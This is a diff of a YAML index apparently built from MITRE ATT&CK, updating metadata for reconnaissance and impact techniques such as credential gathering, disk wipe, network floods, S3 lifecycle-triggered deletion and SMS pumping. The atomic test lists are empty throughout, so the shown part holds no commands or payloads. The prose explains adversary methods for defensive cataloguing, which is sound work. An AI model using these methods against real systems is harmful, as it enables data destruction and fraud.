-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -62527,7 +63201,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -62543,12 +63217,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -62558,17 +63230,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -62580,6 +63255,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -62590,7 +63266,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -62600,6 +63276,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -62612,6 +63292,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -62634,6 +63318,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -62641,9 +63329,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -62702,7 +63389,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -62722,7 +63409,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -62744,7 +63430,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -62760,12 +63446,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -62834,7 +63518,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -62882,31 +63566,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -62915,19 +63580,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -62985,7 +63672,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -63006,7 +63692,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -63022,8 +63708,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -63049,7 +63733,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -63065,8 +63749,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -63090,7 +63772,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -63112,13 +63794,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -63210,13 +63890,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -63225,7 +63904,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -63242,17 +63920,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -63277,7 +63950,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -63315,7 +63989,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -63349,12 +64023,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -63419,42 +64091,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -63465,13 +64222,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -63479,12 +64243,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -63545,109 +64330,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
